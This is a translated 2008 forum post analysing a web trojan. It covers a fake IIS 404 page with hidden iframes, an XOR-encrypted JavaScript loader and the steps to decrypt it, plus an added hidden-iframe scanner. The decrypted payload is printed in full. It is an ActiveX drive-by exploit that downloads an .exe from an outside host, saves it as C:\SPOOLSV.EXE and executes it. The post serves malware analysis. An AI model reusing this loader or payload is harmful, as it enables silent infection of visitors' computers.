Original poster | Posted 2008-6-9 02:19:46 | From Zhanjiang, Guangdong
[Share] A simple workflow for obtaining a web trojan sample
Last night I found a trojan and did a quick analysis of it. The trojan's path is: http://www.****.com/ma/web.htm
Find a way to get its source. Preferably don't use IE; I browsed it with Firefox, but what I saw was a 404 page, as follows:
Quote:
The page cannot be found
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
Please try the following:
* Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.
* If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.
* Click the Back button to try another link.
HTTP Error 404 - File or directory not found.
Internet Information Services (IIS)
Technical Information (for support personnel)
* Go to Microsoft Product Support Services and perform a title search for the words HTTP and 404.
* Open IIS Help, which is accessible in IIS Manager (inetmgr), and search for topics titled Web Site Setup, Common Administrative Tasks, and About Custom Error Messages.
Don't be fooled; take a look at its source:
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>无法找到该页</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=GB2312">
<STYLE type="text/css">
BODY { font: 9pt/12pt 宋体 }
H1 { font: 12pt/15pt 宋体 }
H2 { font: 9pt/12pt 宋体 }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip2.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip3.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip4.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip5.html" width="0" height="0" border="0"></iframe>
<iframe src="vip6.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip7.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip.htm" width="50" height="0" border="0"></iframe>
<h1>无法找到该页</h1>
您正在搜索的页面可能已经删除、更名或暂时不可用。
<hr>
<p>请尝试以下操作:</p>
<ul>
<li>确保浏览器的地址栏中显示的网站地址的拼写和格式正确无误。</li>
<li>如果通过单击链接而到达了该网页,请与网站管理员联系,通知他们该链接的格式不正确。
</li>
<li>单击<a href="javascript:history.back(1)">后退</a>按钮尝试另一个链接。</li>
</ul>
<h2>HTTP 错误 404 - 文件或目录未找到。<br>Internet 信息服务 (IIS)</h2>
<hr>
<p>技术信息(为技术支持人员提供)</p>
<ul>
<li>转到 <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft 产品支持服务</a>并搜索包括“HTTP”和“404”的标题。</li>
<li>打开“IIS 帮助”(可在 IIS 管理器 (inetmgr) 中访问),然后搜索标题为“网站设置”、“常规管理任务”和“关于自定义错误消息”的主题。</li>
</ul>
</TD></TR></TABLE></BODY></HTML>
See the iframes inside it? Rendered, they are invisible (zero width or height), but each one still loads and runs its page:
Code:
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip2.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip3.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip4.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip5.html" width="0" height="0" border="0"></iframe>
<iframe src="vip6.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip7.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip.htm" width="50" height="0" border="0"></iframe>
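As an added example that is not part of the original post, here is a small Node.js scanner for exactly this pattern: it pulls every iframe tag out of a saved HTML file, flags the ones declared with a zero width or height, and treats a page that claims to be a 404 while embedding hidden frames as a decoy. The sample HTML inside it is a constructed excerpt modelled on the fake 404 page above, and the function names are my own.

```javascript
// Added example (not from the original post): a static scanner for the
// hidden-iframe pattern in the fake 404 page above. It works on a saved HTML
// string under Node.js without rendering anything; function names are my own.

// Every <iframe ...> opening tag; the attribute text is parsed separately.
const IFRAME_RE = /<iframe\b([^>]*)>/gi;
// name="value", name='value' or bare name=value, case-insensitive.
const ATTR_RE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

function parseAttrs(attrText) {
  const attrs = {};
  let m;
  ATTR_RE.lastIndex = 0;
  while ((m = ATTR_RE.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3] !== undefined ? m[3] : m[4];
  }
  return attrs;
}

// "Hidden" here means a declared width or height of 0 or less: the frame loads
// and runs its content but paints nothing the user can see. The vip.htm frame
// in the post has width 50 and height 0, so each axis is checked on its own.
function isHiddenIframe(attrs) {
  const w = parseInt(attrs.width, 10);
  const h = parseInt(attrs.height, 10);
  return (Number.isFinite(w) && w <= 0) || (Number.isFinite(h) && h <= 0);
}

// Returns one record per hidden frame, in document order.
function findHiddenIframes(html) {
  const hits = [];
  let m;
  IFRAME_RE.lastIndex = 0;
  while ((m = IFRAME_RE.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    if (isHiddenIframe(attrs)) {
      hits.push({ src: attrs.src || "", width: attrs.width, height: attrs.height });
    }
  }
  return hits;
}

// A genuine IIS 404 page carries no frames at all, so "says not found" plus
// "embeds hidden frames" is a strong sign of the decoy seen in the post.
function looksLikeFake404(html) {
  const saysNotFound = /404|无法找到该页|cannot be found/i.test(html);
  return saysNotFound && findHiddenIframes(html).length > 0;
}

// Constructed sample modelled on the decoy page above (frame list shortened,
// one visible frame added for contrast).
const SAMPLE_HTML = `
<HTML><HEAD><TITLE>无法找到该页</TITLE></HEAD><BODY>
<iframe src="vip1.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip2.htm" width="0" height="0" border="0"></iframe>
<iframe src="vip.htm" width="50" height="0" border="0"></iframe>
<iframe src='visible.htm' width='300' height='200'></iframe>
<h1>无法找到该页</h1>
</BODY></HTML>`;

console.log(JSON.stringify(findHiddenIframes(SAMPLE_HTML)));
console.log("fake 404:", looksLikeFake404(SAMPLE_HTML));
```

Run it with `node scan.js` against any saved page; the regex approach is deliberate so the file is never parsed by a real browser engine, which is the point when the frames are the infection vector.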
Pretty ruthless: eight of them added at once. Pick any one to look at; let's take the first, vip1.htm. Its source is as follows:
Code:
<script>
strHTML="";
strHTML+="%0BJP%17XG%12%14%16F%05%0DZF@%15%02J%1DR%16%16Q%11Y%5B%01RK%05%0AITJ%1";
strHTML+="C%06%1F%5D%15%0AY%1B%15S@%5BD%11%06%12EFK%5BG%16WC%13%17%06%08il%0BW%5";
strHTML+="C%16RE%0FD%11%0AF%3D8%0E%5D%03J%04_TEK@%01%0F%18%5C%05J%0F%02%14VTV%5B";
strHTML+="%11%3Al%08JZ%09CQ@%5D%15L%5B%3F%3BYKQ%10%5BB%16%19%09%07%0A%01BXT%00%0";
strHTML+="C%15%2CU%13U5S@%5BD%11%1A%5B%3F%3BY%19%1FO%3F8%06V%06%13%09%03YM%1D%12";
strHTML+="C%5E%12Q%09ZN%12%0EAW%17Q%15F%0F%13Y@BQG%16%5C%14%17H%05BMV%14@%05J%5D";
strHTML+="%01%18%0FT%00%1E%5D%01%0BI%5BUQ%14%5B%06J%1E%06R%5E%05%11%12RHBXm%15%0";
strHTML+="E@%11D%5C%1F%1DEC%12%16%0EX%00%5D%00%0ALQ%5D%0F%16%5DH%01%1ERe%11%5ERB";
strHTML+="%12Q%14ET%0Dn%10hT%08Vn%06Wd%03Q%06nS%0AQ%3AUT%04e%02W%01kW%05RhW%01%0";
strHTML+="5n%05T%099%03%03Vd%03P%04nW%0F9WTSk%08%00Um%06V%019%16%5DYV%0FhG%5B%09";
strHTML+="SB%16QV%3E%10%09%0B%5DW%5B8DTU@%0CU%0D%3A%16%5E%5D%02%03%0Fn%16%27%7C%";
strHTML+="5C%04rP%0D%04O%04%07%23%0AHWU%22%07e%11%5EXSR%099%16K%09%0A%01uH%08Uq%";
strHTML+="01Q%7EqP%0BwQ%0F9D_%0FSA%0E%0CU%05M%5D%01%07MYV%06%0F%01SXn%13%0AHW%0C";
strHTML+="n%10YM%17%1F%1F%10VK%13%04UX%5B%1C%01%5B%05E_WZ%11%16%06@T%04LW%27%5EW";
strHTML+="%0F%5C%0B%12L%3A%15VQ%0FTT%12hG%1DO%0BDSFE%5CX%03%0A%04%5C%5DLAW%16x%1";
strHTML+="1%12%16%0FULG%00%19%5E%02%18%0CP%1E%19%09DU%17%18%06ZX%09Y__%03%09%14X";
strHTML+="%17F%07%13C%5CB%14RY%5BU%01%5BHs@WU%11%5D*P%5B%00%5BFJn%10\/P%06%14%0B%";
strHTML+="15X_GKIZ%0A%7C1%606l%10%1EhGdG%1B%0A%13Y@BT%0FS%02%13%07%16FTLG%00@FU%";
strHTML+="099%16%27T%5Dn%16%5EN%04@%11%06MF%07CCV%049D%00%04%19jG9%13%0C%10U%17%";
strHTML+="14%05EFWE%14%0DXn%13%17%5DS%0Fn%10YO%04%14D%01%0A%08%08%13PEFC%12C%05E";
strHTML+="FWE%14%5B%0B%0FP%01W%1C%01@W%03M%00%09%06%0CRZGMRB%12Q%14EU%1BQG@%00I%";
strHTML+="14%06%1A%06MF%07CCW%159D8D%1E%02E%04C%17%0E%09T%0F%05EFWE%14%5B%0B%1C%";
strHTML+="7E%15%5D%5CJn%10%25%7C1%3AFJTLG%00@FJ%04L%0F%05EFWE%14%5B%0B%1Cb%00VVJ";
strHTML+="%1B%09%15N%12%05%11%12RHB%06_%19%12M%15Q%5B%01%09DU%17%18%0B%0F%00%5EO";
strHTML+="E%15QG%16%5C%14%17%07%08%19VC%00_%1FO%0F%12C%11SGFQ%14I%06%5C%1F%12J%5";
strHTML+="B%16W%1A%01L%11%03%15%17TW%1D%17TD%16%5B%0BG%03r%5DVML%03%12EF%06MF%07";
strHTML+="CC%01WK%15%05%10RM%5C%03X%5B%03%1C%06A%12UCC%06I%0AL%09F%12OQ%17FW%13H";
strHTML+="%06%08J%05%5BV@%00%19%1E%5DB%04FFSGFQ%14I%06%5CBXYV%0D%1CQ%10%5C%04%12";
strHTML+="%01%09USV%06E%1F%3A%166%5C%03%5C%7E%1Cu%15H%09%5BR%04L%5B%0D%5Cn@%159D";
strHTML+="8D%1E%02P%10ER%17E%06Z%15%1EazQ%29t%00jT%06mF%07%1AQ%17M%00%17%15T%1Be";
strHTML+="%119%13%1B%3A%169%16JTY%1E%04L%03%18QP%11%5BZJQZ%0BU%04%0BM%1DJ%02%0FJ";
strHTML+="BT%14%5D%15@%3A%0E%10%1B%0Fh2J%1D%1CH%06%3Fh%0E%1D%11Z%17%0F%14%12%094";
strHTML+="9YBT%14%5D%15@FDKBQX%1A%11WI%11%17X%11Q@%0BI%11DZ%00BWP%11XX%08%14%0CZ";
strHTML+="%0FD%1A%1B%14%1E%18%01%5DR%10UW%0CF%1C%15K%0C%12%01N%15%1B%1A%5EL@%0FZ";
strHTML+="%01%5B%11%1E%5D%5CX%0AY%01%12%0CEQ%5C%0BF%09%5E%16%16%05%16%0FGM%0Dh%3";
strHTML+="B%0B%04%5B%01MF_%5CQ%5B%0BL%00JE%08%5D%5C%17%0F%10%10%5C%11%13%16%08%1";
strHTML+="7_R%09BRD%14%0AZ%15U%5EWW%11K%11SC%11%05%10%10WF%17K%0BF%02%07%5BJVG%1";
strHTML+="1X%08P%17U%01CFSF%11%05G@T%11M@%0C%12T%03U%16%03FX";
function XOR(strV,strPass){
var intPassLength=strPass.length;
var re="";
for(var i=0;i<strV.length;i++){
re+=String.fromCharCode(strV.charCodeAt(i)^strPass.charCodeAt(i%intPassLength));
}
return(re);
}
var STR =
{
hexcase : 0, /* hex output format. 0 - lowercase; 1 - uppercase */
b64pad : "", /* base-64 pad character. "=" for strict RFC compliance */
chrsz : 8, /* bits per input character. 8 - ASCII; 16 - Unicode */
b64_hmac_md5:
function(key, data) { return binl2b64(core_hmac_md5(key, data)); },
b64_md5:
function(s){ return binl2b64(core_md5(str2binl(s), s.length * this.chrsz));},
binl2b64:
function(binarray){
var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012****6789+/";
var str = "";
for(var i = 0; i < binarray.length * 4; i += 3)
{
var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
| (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
| ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
for(var j = 0; j < 4; j++)
{
if(i * 8 + j * 6 > binarray.length * 32) str += this.b64pad;
else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
}
}
return str;
},
binl2hex:
function(binarray){
var hex_tab = this.hexcase ? "012****6789ABCDEF" : "012****6789abcdef";
var str = "";
for(var i = 0; i < binarray.length * 4; i++)
{
str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
}
return str;
},
binl2str:
function(bin){
var str = "";
var mask = (1 << this.chrsz) - 1;
for(var i = 0; i < bin.length * 32; i += this.chrsz)
str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
return str;
},
bit_rol:
function(num, cnt){return (num << cnt) | (num >>> (32 - cnt));},
core_hmac_md5:
function(key, data){
var bkey = str2binl(key);
if(bkey.length > 16) bkey = core_md5(bkey, key.length * this.chrsz);
var ipad = Array(16), opad = Array(16);
for(var i = 0; i < 16; i++)
{
ipad[i] = bkey[i] ^ 0x363****3636;
opad[i] = bkey[i] ^ 0x5C5C5C5C;
}
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * this.chrsz);
return core_md5(opad.concat(hash), 512 + 128);
},
core_md5:
function(x, len){
/* append padding */
x[len >> 5] |= 0x80 << ((len) % 32);
x[(((len + 64) >>> 9) << 4) + 14] = len;
var a = 173****4193;
var b = -271****3879;
var c = -173****4194;
var d = 271****3878;
for(var i = 0; i < x.length; i += 16)
{
var olda = a;
var oldb = b;
var oldc = c;
var oldd = d;
a = this.md5_ff(a, b, c, d, x[i+ 0], 7 , -680****6936);
d = this.md5_ff(d, a, b, c, x[i+ 1], 12, -389****4586);
c = this.md5_ff(c, d, a, b, x[i+ 2], 17, 606****5819);
b = this.md5_ff(b, c, d, a, x[i+ 3], 22, -104****5330);
a = this.md5_ff(a, b, c, d, x[i+ 4], 7 , -176****8897);
d = this.md5_ff(d, a, b, c, x[i+ 5], 12, 120****0426);
c = this.md5_ff(c, d, a, b, x[i+ 6], 17, -147****1341);
b = this.md5_ff(b, c, d, a, x[i+ 7], 22, -457****5983);
a = this.md5_ff(a, b, c, d, x[i+ 8], 7 , 177****5416);
d = this.md5_ff(d, a, b, c, x[i+ 9], 12, -195****4417);
c = this.md5_ff(c, d, a, b, x[i+10], 17, -42***63);
b = this.md5_ff(b, c, d, a, x[i+11], 22, -199****4162);
a = this.md5_ff(a, b, c, d, x[i+12], 7 , 180****3682);
d = this.md5_ff(d, a, b, c, x[i+13], 12, -403****1101);
c = this.md5_ff(c, d, a, b, x[i+14], 17, -150****2290);
b = this.md5_ff(b, c, d, a, x[i+15], 22, 123****5329);
a = this.md5_gg(a, b, c, d, x[i+ 1], 5 , -165****6510);
d = this.md5_gg(d, a, b, c, x[i+ 6], 9 , -106****1632);
c = this.md5_gg(c, d, a, b, x[i+11], 14, 643****7713);
b = this.md5_gg(b, c, d, a, x[i+ 0], 20, -373****7302);
a = this.md5_gg(a, b, c, d, x[i+ 5], 5 , -701****8691);
d = this.md5_gg(d, a, b, c, x[i+10], 9 , 380****6083);
c = this.md5_gg(c, d, a, b, x[i+15], 14, -660****8335);
b = this.md5_gg(b, c, d, a, x[i+ 4], 20, -405****7848);
a = this.md5_gg(a, b, c, d, x[i+ 9], 5 , 568****6438);
d = this.md5_gg(d, a, b, c, x[i+14], 9 , -101****3690);
c = this.md5_gg(c, d, a, b, x[i+ 3], 14, -187****3961);
b = this.md5_gg(b, c, d, a, x[i+ 8], 20, 116****1501);
a = this.md5_gg(a, b, c, d, x[i+13], 5 , -144****1467);
d = this.md5_gg(d, a, b, c, x[i+ 2], 9 , -514****3784);
c = this.md5_gg(c, d, a, b, x[i+ 7], 14, 173****8473);
b = this.md5_gg(b, c, d, a, x[i+12], 20, -192****7734);
a = this.md5_hh(a, b, c, d, x[i+ 5], 4 , -37***58);
d = this.md5_hh(d, a, b, c, x[i+ 8], 11, -202****4463);
c = this.md5_hh(c, d, a, b, x[i+11], 16, 183****0562);
b = this.md5_hh(b, c, d, a, x[i+14], 23, -353****9556);
a = this.md5_hh(a, b, c, d, x[i+ 1], 4 , -153****2060);
d = this.md5_hh(d, a, b, c, x[i+ 4], 11, 127****3353);
c = this.md5_hh(c, d, a, b, x[i+ 7], 16, -155****7632);
b = this.md5_hh(b, c, d, a, x[i+10], 23, -109****0640);
a = this.md5_hh(a, b, c, d, x[i+13], 4 , 681****9174);
d = this.md5_hh(d, a, b, c, x[i+ 0], 11, -358****7222);
c = this.md5_hh(c, d, a, b, x[i+ 3], 16, -722****1979);
b = this.md5_hh(b, c, d, a, x[i+ 6], 23, 760****9189);
a = this.md5_hh(a, b, c, d, x[i+ 9], 4 , -640****4487);
d = this.md5_hh(d, a, b, c, x[i+12], 11, -421****5835);
c = this.md5_hh(c, d, a, b, x[i+15], 16, 530****2520);
b = this.md5_hh(b, c, d, a, x[i+ 2], 23, -995****8651);
a = this.md5_ii(a, b, c, d, x[i+ 0], 6 , -198****0844);
d = this.md5_ii(d, a, b, c, x[i+ 7], 10, 112****1415);
c = this.md5_ii(c, d, a, b, x[i+14], 15, -141****4905);
b = this.md5_ii(b, c, d, a, x[i+ 5], 21, -574****4055);
a = this.md5_ii(a, b, c, d, x[i+12], 6 , 170****5571);
d = this.md5_ii(d, a, b, c, x[i+ 3], 10, -189****6606);
c = this.md5_ii(c, d, a, b, x[i+10], 15, -10***23);
b = this.md5_ii(b, c, d, a, x[i+ 1], 21, -205****2799);
a = this.md5_ii(a, b, c, d, x[i+ 8], 6 , 187****3359);
d = this.md5_ii(d, a, b, c, x[i+15], 10, -306****1744);
c = this.md5_ii(c, d, a, b, x[i+ 6], 15, -156****8380);
b = this.md5_ii(b, c, d, a, x[i+13], 21, 130****1649);
a = this.md5_ii(a, b, c, d, x[i+ 4], 6 , -145****3070);
d = this.md5_ii(d, a, b, c, x[i+11], 10, -112****0379);
c = this.md5_ii(c, d, a, b, x[i+ 2], 15, 718****7259);
b = this.md5_ii(b, c, d, a, x[i+ 9], 21, -343****5551);
a = this.safe_add(a, olda);
b = this.safe_add(b, oldb);
c = this.safe_add(c, oldc);
d = this.safe_add(d, oldd);
}
return Array(a, b, c, d);
},
hex_hmac_md5:function(key, data){ return this.binl2hex(this.core_hmac_md5(key, data)); },
hex_md5:function(s){return this.binl2hex(this.core_md5(this.str2binl(s), s.length * this.chrsz));},
md5:function(s){return(this.hex_md5(s));},
md5_cmn:function(q, a, b, x, s, t){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(a, q), this.safe_add(x, t)), s),b);},
md5_ff:function(a, b, c, d, x, s, t){return this.md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);},
md5_gg:function(a, b, c, d, x, s, t){return this.md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);},
md5_hh:function(a, b, c, d, x, s, t){return this.md5_cmn(b ^ c ^ d, a, b, x, s, t);},
md5_ii:function(a, b, c, d, x, s, t){return this.md5_cmn(c ^ (b | (~d)), a, b, x, s, t);},
md5_vm_test:function(){return hex_md5("abc") == "900****0983cd24fb0d6963f7d28e17f72";},
safe_add:
function(x, y){
var lsw = (x & 0xFFFF) + (y & 0xFFFF);
var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
},
str2binl:
function(str){
var bin = Array();
var mask = (1 << this.chrsz) - 1;
for(var i = 0; i < str.length * this.chrsz; i += this.chrsz)
bin[i>>5] |= (str.charCodeAt(i / this.chrsz) & mask) << (i%32);
return bin;
},
str_hmac_md5:function(key, data){ return binl2str(core_hmac_md5(key, data)); },
str_md5:function(s){ return binl2str(core_md5(str2binl(s), s.length * this.chrsz));}
}
function performPage(strPass){
if(strPass){
document.cookie="password="+escape(strPass);
document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
var pass="%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26";
if(pass){
pass=unescape(pass);
document.write(XOR(unescape(strHTML),STR.md5(pass)));
return(false);
}
}
performPage();
</script>
Dizzy yet? That's a lot of code (the runs of digits shown as **** in the listing are masked by the forum's filter), so let's go through it piece by piece:
The strHTML variable is the encrypted code string.
The function XOR(strV,strPass) is used to decrypt it, and a password was set as well. Heh, I find that pretty funny: setting a password on the JS side!
The main thing to look at is the last function; I've added some comments:
Code:
function performPage(strPass){
if(strPass){
document.cookie="password="+escape(strPass);//write the password, escape-encoded, into a cookie; used to tell whether it has already run
document.write(XOR(unescape(strHTML),STR.md5(strPass)));//decrypt the strHTML above and execute it
return(false);
}//check whether strPass exists; if it does, run the two statements in this block.
var pass="%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26";//the password
if(pass){
pass=unescape(pass);//decode the string with the unescape function; we'll see what it is shortly, hold on.
document.write(XOR(unescape(strHTML),STR.md5(pass)));//decrypt the strHTML above with the XOR function and execute it.
return(false);
}
}
Finally, performPage() is called.
Now let's see what is actually in its source:
Save vip1.htm locally.
First, let's find out what the password is:
Change the performPage function to the following, then open vip1.htm in the browser:
Code:
function performPage(strPass){
if(strPass){
//document.cookie="password="+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
var pass="%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass)));
document.write(pass);
return(false);
}
}
performPage();
</script>
The browser displays (the string reads, roughly, "the key can be Chinese, or any characters"):
Quote:
密匙可以是中文,或任意字符
Sweat. Now let's see how the trojan code is written:
Modify the following part of performPage as shown, so the decrypted text lands in a textarea instead of being written into the document and executed:
Code:
function performPage(strPass){
if(strPass){
//document.cookie="password="+escape(strPass);
//document.write(XOR(unescape(strHTML),STR.md5(strPass)));
return(false);
}
var pass="%u5BC6%u5319%u53EF%u4EE5%u662F%u4E2D%u6587%uFF0C%u6216%u4EFB%u610F%u5B57%u7B26";
if(pass){
pass=unescape(pass);
//document.write(XOR(unescape(strHTML),STR.md5(pass)));
//document.write(pass);
document.getElementById( "muma" ).value = XOR(unescape(strHTML),STR.md5(pass));
return(false);
}
}
//performPage();
</script>
<textarea id="muma" name="muma" rows="10" cols="50"></textarea>
<script language=javascript>performPage();</script>
Open vip1.htm in the browser and the original strHTML code comes out:
Code:
<script src=http://cs.cskick.cn/cs/c.js></script>www.cuteqq.cn
<noscript>
<iframe src=*></iframe>
</noscript>
<script language="JavaScript">
<!--
document.writeln("<script>var cuteqq,cuteqq2,id,id2,id3,id4,idx,dk;cuteqq=\"http://www.kj1888.com/8.exe\";cuteqq2=\"\103\72\134\134\123\120\117\117\111\123\126\56\105\130\105\";id=\"classid\";id2=\"clsid:\";id3=\"BD96C556-65A3-11D0\";id4=\"-983A-00C04FC29E36\";idx=id2+id3+id4;dk=\"open\";try{var ado=(document.createElement(\"object\"));var d=1;ado.setAttribute(id,idx);var chilam=1;var cuteqqcn=ado.CreateObject(\"Microsoft.xmlHTTP\",\"\");var f=1;var cuteqq3=\"Ado\";var cuteqq4=\"db.St\";var cuteqq5=\"ream\";var g=1;var wwwcuteqqcn=ado.createobject(cuteqq3+cuteqq4+cuteqq5,\"\");var h=1;cuteqqcn.Open(\"GET\",cuteqq,0);cuteqqcn.Send();wwwcuteqqcn.type=1;var n=1;wwwcuteqqcn.open();wwwcuteqqcn.write(cuteqqcn.responseBody);wwwcuteqqcn.savetofile(cuteqq2,2);wwwcuteqqcn.close();var cuteqqcns=ado.createobject(\"ShelL.Application\",\"\");cuteqqcns.SHeLLeXecUte(cuteqq2,\"\",\"\",dk,0);}catch(chilam){};</script\>");
//-->
</script>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
The trojan's exe file address is out too; now everyone can grab the sample and analyze it!